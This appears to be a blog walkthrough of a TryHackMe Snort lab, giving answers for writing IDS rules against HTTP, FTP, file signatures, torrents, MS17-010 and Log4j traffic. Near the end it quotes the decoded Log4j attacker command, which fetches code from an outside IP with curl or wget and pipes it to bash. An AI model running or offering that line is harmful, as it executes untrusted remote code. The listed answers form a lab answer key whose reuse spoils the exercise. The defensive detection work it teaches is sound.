Snort Challenge - The Basics | Tryhackme write-up

👋 Hi, I’m Umamaheswari. Through this blog, I share visual walkthroughs and hands-on investigations on PCAP, phishing, Splunk, ELK, malware, and digital forensics, based on labs from TryHackMe, HackTheBox and CyberDefenders. Feel free to connect or ask questions; I am more than happy to help.

Task 2: Writing IDS Rules (HTTP)

Let's create IDS Rules for HTTP traffic!

Navigate to the task folder and use the given pcap file.
Write a rule to detect all TCP packets from or to port 80.
What is the number of detected packets you got?
Note: You must answer this question correctly before answering the rest of the questions.

Ans: 164

Investigate the log file.

What is the destination address of packet 63?

Ans: 216.239.59.99

Hint: the "-n" parameter tells Snort to stop after processing the given number of packets, so "-n 63" reads packets 1 to 63 of the log.

snort -r snort.log.1760194135 -n 63 -q

Investigate the log file.

What is the ACK number of packet 64?

Ans: 0x2E6B5384

Investigate the log file.

What is the SEQ number of packet 62?

Ans: 0x36C21E28

Investigate the log file.

What is the TTL of packet 65?

Ans: 128

Investigate the log file.

What is the source IP of packet 65?

Ans: 145.254.160.237

Investigate the log file.

What is the source port of packet 65?

Ans: 3372

Task 3: Writing IDS Rules (FTP)

Steps: write the rule in local.rules, check it with sudo snort -c local.rules -T, then run Snort against the pcap file with that rule in -A full mode, saving the log and alert files in the current directory.


Let's create IDS Rules for FTP traffic!

Navigate to the task folder. Use the given pcap file.

Write a single rule to detect "all TCP port 21" traffic in the given pcap.

What is the number of detected packets?

Ans: 307

Investigate the log file.

What is the FTP service name?

Ans: Microsoft FTP Service

hint: Strings or the -a option with grep might help.

Actually, after struggling a bit, I looked up on Google how to use strings and grep's -a option with pcap files.

grep -a "keyword" treats a binary file as text, so the ASCII strings inside it can be matched.

strings <file>.pcap | grep "keyword"

-B5 and -A5 tell grep to also print the 5 lines before and the 5 lines after each line that matches the specified string.

Using strings:

strings <file>.pcap prints all the printable strings found in the provided pcap file.

These strings will help with the following questions.

The FTP protocol uses three-digit reply codes to report the result of each command:

530 = User "username" cannot log in (failed login attempt: the username or password is incorrect)

230 = User "username" logged in (both username and password were correct)

331 = Password required for "username" (after the username is sent to the FTP service, it asks for the password)

There are more FTP reply codes than these.


Clear the previous log and alarm files.
Deactivate/comment on the old rules.

Write a rule to detect failed FTP login attempts in the given pcap.

What is the number of detected packets?

Ans: 41

Clear the previous log and alarm files.
Deactivate/comment on the old rule.

Write a rule to detect successful FTP logins in the given pcap.

What is the number of detected packets?

Ans: 1

Clear the previous log and alarm files.
Deactivate/comment on the old rule.

Write a rule to detect FTP login attempts with a valid username but no password entered yet.

What is the number of detected packets?

Ans: 42

Clear the previous log and alarm files.
Deactivate/comment on the old rule.

Write a rule to detect FTP login attempts with the "Administrator" username but no password entered yet.

What is the number of detected packets?

Ans: 7

hint: You can use the "content" filter more than one time.

Task 4: Writing IDS Rules (PNG)

Let's create IDS Rules for PNG files in the traffic!

Navigate to the task folder. Use the given pcap file. Write a rule to detect the PNG file in the given pcap.

Investigate the logs and identify the software name embedded in the packet.

Ans:

Create a rule to detect the PNG file.

Go to https://en.wikipedia.org/wiki/List_of_file_signatures, which lists the signatures of all common file types.

Copy the PNG file hex signature: 89 50 4E 47 0D 0A 1A 0A

Since there is only 1 alert, we found only 1 PNG file in the provided pcap.

So there is only 1 log entry, and the details of only 1 packet, in the log file.

strings makes the packet contents easier to read.

Clear the previous log and alarm files.
Deactivate/comment on the old rule.

Write a rule to detect the GIF file in the given pcap.

Investigate the logs and identify the image format embedded in the packet.

Ans: GIF89a

There are 2 GIF file signatures, so which one should I add? I started with the 1989 version.

| Bytes (Hex) | ASCII | Meaning | Features |
| --- | --- | --- | --- |
| 47 49 46 38 37 61 | GIF87a | Original 1987 version | Basic still images |
| 47 49 46 38 39 61 | GIF89a | Updated 1989 version | Supports animation, transparency, comments |

Let's add both, as two different rules, because a single rule cannot match both signatures (every content option in a rule has to be found in the same packet).

The alert matched SID 1000002, which is the rule for the GIF89a file signature.

EXTRA: when doing network analysis with any tool, there are always multiple ways to get a result, depending on your need and requirement. It is always best to learn multiple ways, as you never know which one you will need.

Snort captured 4 alerts, which means 4 GIF files were found: 4 alerts in the alert file as well as in the snort.log file.

Hence it is easy to go through such a small file manually.

We can also use the ASCII form of the signature (e.g. GIF89a) instead of the hex bytes.
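To show how the rules in Task 3 (one rule per FTP reply code, with a second content option for the username) and Task 4 (PNG and GIF signatures written as hex or ASCII) actually match, here is an added Python emulation of Snort's content option; it is example code written for this write-up, not code from the room, from the author or from Snort. The Snort rules quoted in its comments are the shape I would write them in, and the packet payloads are constructed.

```python
# Added example: emulates Snort's "content" matching for the Task 3 FTP rules and
# the Task 4 file-signature rules.  Equivalent Snort rules would look like
#   alert tcp any 21 -> any any (msg:"FTP failed login"; content:"530 "; sid:1000001; rev:1;)
#   alert tcp any any -> any any (msg:"PNG file"; content:"|89 50 4E 47 0D 0A 1A 0A|"; sid:1000003; rev:1;)

def content_to_bytes(value):
    """Turn a Snort content string into raw bytes.

    Snort mixes literal text and |hex byte| segments in one string, so
    "|89 50 4E 47 0D 0A 1A 0A|", "GIF|38 39|a" and "GIF89a" all work.
    (The ! negation and modifiers such as nocase/depth are not handled.)
    """
    out = bytearray()
    for i, seg in enumerate(value.split("|")):
        # even-numbered segments are literal text, odd-numbered ones are hex
        out += seg.encode("latin-1") if i % 2 == 0 else bytes.fromhex(seg)
    return bytes(out)

def rule_matches(contents, payload):
    """A rule with several content options fires only when EVERY one is found
    in the same packet (Task 3 hint: content may be used more than once)."""
    return all(content_to_bytes(c) in payload for c in contents)

def count_alerts(contents, packets):
    """Number of packets a rule would alert on (one alert per packet)."""
    return sum(1 for p in packets if rule_matches(contents, p))

# Constructed sample payloads standing in for the pcap's packets.
PACKETS = [
    b"USER Administrator\r\n",
    b"331 Password required for Administrator.\r\n",
    b"PASS wrong\r\n",
    b"530 User Administrator cannot log in.\r\n",
    b"331 Password required for alice.\r\n",
    b"230 User alice logged in.\r\n",
    b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR",   # PNG header
    b"GIF89a\x01\x00\x01\x00\x80",            # GIF, 1989 version
    b"GIF87a\x01\x00\x01\x00\x80",            # GIF, 1987 version
]

FTP_FAILED   = ["530 "]
FTP_SUCCESS  = ["230 "]
FTP_NEEDPASS = ["331 "]
FTP_ADMIN    = ["331 ", "Administrator"]   # two content options, both must match
PNG_SIG      = ["|89 50 4E 47 0D 0A 1A 0A|"]
GIF89A_HEX   = ["|47 49 46 38 39 61|"]
GIF89A_ASCII = ["GIF89a"]                  # same bytes written as ASCII
```

Putting GIF87a and GIF89a in one rule as two content options never fires, which is why the write-up uses two separate rules.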

Task 5: Writing IDS Rules (Torrent Metafile)

Let's create IDS Rules for torrent metafiles in the traffic!

Write a rule to detect the torrent metafile in the given pcap.

What is the number of detected packets?

Ans: 2

hint: Torrent metafiles have a common name extension (.torrent).

Investigate the log/alarm files.

What is the name of the torrent application?

Ans: bittorrent

Investigate the log/alarm files.

What is the MIME (Multipurpose Internet Mail Extensions) type of the torrent metafile?

Ans: application/x-bittorrent

Investigate the log/alarm files.

What is the hostname of the torrent metafile?

Ans: tracker2.torrentbox.com

Task 6: Troubleshooting Rule Syntax Errors

Let's troubleshoot rule syntax errors!

In this section, you need to fix the syntax errors in the given rule files.

You can test each ruleset with the following command structure (replace X with the number of the rule file you are fixing):

sudo snort -c local-X.rules -r mx-1.pcap -A console

Fix the syntax error in local-1.rules file and make it work smoothly.

What is the number of the detected packets?

Ans: 16

Hint: Spaces matter! Run snort -c local-1.rules -T, look for errors in the output and change the rule accordingly.

snort -c local-1.rules -r mx-1.pcap -A console

Fix the syntax error in local-2.rules file and make it work smoothly.

What is the number of the detected packets?
Ans: 68

hint: Don't forget the ports! (any)

Fix the syntax error in local-3.rules file and make it work smoothly.

What is the number of the detected packets?
Ans: 87

hint: SIDs should be unique!

Fix the syntax error in local-4.rules file and make it work smoothly.

What is the number of the detected packets?
Ans: 90

hint: Semicolons matter!

Fix the syntax error in local-5.rules file and make it work smoothly.

What is the number of the detected packets?
Ans: 155

hint: Direction and colons! (->)

Fix the logical error in local-6.rules file and make it work smoothly to create alerts.

What is the number of the detected packets?
Ans: 2

hint: Case matters (content matches are case sensitive), and so do spaces.

Fix the logical error in local-7.rules file and make it work smoothly to create alerts.

What is the name of the required option?
Ans: msg

hint: Rules without messages don't make sense!

In the above rule, with or without case, I get the same results.
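The syntax problems Task 6 walks through (a missing port, a bad direction operator, missing semicolons or colons, a missing msg, duplicate SIDs) can be caught by a small shape check before running snort -T. The checker below is an added example, not the room's or the author's code; the RULES sample it lints is constructed, with one deliberate mistake per line after the first.

```python
# Added example (not from the room or the write-up): a shape checker for the rule
# mistakes Task 6 hints at (missing port, bad arrow, missing ';' or ':', missing
# msg, duplicate SIDs).  It only checks shape; "snort -T" stays the real test.
import re

# one option: a name, optionally ':' and a quoted or bare value (sid:1, msg:"x", nocase)
OPTION_RE = re.compile(r'\w+(\s*:\s*!?\s*("[^"]*"|[^";]*))?')

def lint_rule(rule):
    """Problems found in one Snort rule line (empty list = looks fine)."""
    m = re.fullmatch(r"\s*([^(]*)\((.*)\)\s*", rule)
    if not m: return ["rule options must be enclosed in ( ... )"]
    fields, body, problems = m.group(1).split(), m.group(2), []
    if len(fields) != 7:   # action proto src_ip src_port direction dst_ip dst_port
        problems.append(f"header has {len(fields)} fields, expected 7 (forgot a port?)")
    elif fields[4] not in ("->", "<>"):
        problems.append(f"bad direction operator {fields[4]!r}, expected -> or <>")
    if not body.rstrip().endswith(";"):      # every option ends with ';'
        problems.append("last option is missing its semicolon")
    names = []
    for opt in (o.strip() for o in body.split(";") if o.strip()):
        if not OPTION_RE.fullmatch(opt):
            problems.append(f"malformed option {opt!r} (missing ';' or ':'?)")
        names.append(opt.split(":", 1)[0].strip())
    for required in ("msg", "sid"):
        if required not in names:
            problems.append(f"required option {required!r} is missing")
    return problems

def lint_ruleset(text):
    """Lint a whole rules file -> {line number: problems}; also flags duplicate SIDs."""
    report, sid_lines = {}, {}
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue                              # blank or commented-out rule
        report[n] = lint_rule(line)
        for sid in re.findall(r"\bsid\s*:\s*(\d+)", line):
            sid_lines.setdefault(sid, []).append(n)
    for sid, lines in sid_lines.items():
        for n in (lines if len(lines) > 1 else []):
            report[n].append(f"sid {sid} is not unique (lines {lines})")
    return report

# Constructed ruleset: line 1 is valid, each later line has one deliberate mistake.
RULES = """\
alert tcp any any -> any 21 (msg:"FTP traffic"; sid:1000001; rev:1;)
alert tcp any any -> any (msg:"port missing"; sid:1000002; rev:1;)
alert tcp any any -> any 80 (msg:"semicolon missing"; sid:1000003; rev:1)
alert tcp any any - any 80 (msg:"bad arrow"; sid:1000004; rev:1;)
alert tcp any any -> any 80 (sid:1000001; rev:1;)
"""
```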

Task 7: Using External Rules (MS17-010)

Let's use external rules to fight against the latest threats!

Navigate to the task folder.

Use the given pcap file.

Use the given rule file (local.rules) to investigate the MS17-010 exploitation.

What is the number of detected packets?

Ans: 25154

Clear the previous log and alarm files.

Use the empty local-1.rules file to write a new rule to detect payloads containing the "\IPC$" keyword.

What is the number of detected packets?

Ans: 12

Investigate the log/alarm files.

What is the requested path?

Ans: \192.168.116.138\IPC$

What is the CVSS v2 score of the MS17-010 vulnerability?

Ans: 9.3

Task 8: Using External Rules (Log4j)

Let's use external rules to fight against the latest threats!

Navigate to the task folder.

Use the given pcap file.

Use the given rule file (local.rules) to investigate the log4j exploitation.

What is the number of detected packets?

Ans: 26

Investigate the log/alarm files.

How many rules were triggered?

Ans: 4

hint: You can investigate the alarm file with CLI commands (cat, grep).

Investigate the log/alarm files.

What are the first six digits of the triggered rule sids?

Ans: 210037

Clear the previous log and alarm files.

Use the empty local-1.rules file to write a new rule to detect packet payloads between 770 and 855 bytes.

What is the number of detected packets?

Ans: 41

Investigate the log/alarm files.

What is the name of the used encoding algorithm?

Ans: base64

Investigate the log/alarm files.

What is the IP ID of the corresponding packet?

Ans: 62808

strings doesn't help with finding packet details like this, since it only extracts ASCII text; it will surely help with the next question.

Investigate the log/alarm files.

Decode the encoded command.

What is the attacker's command?

Ans: (curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|bash

What is the CVSS v2 score of the Log4j vulnerability?

Ans: 9.3

Congratulations! We finally did it!

Happy hunting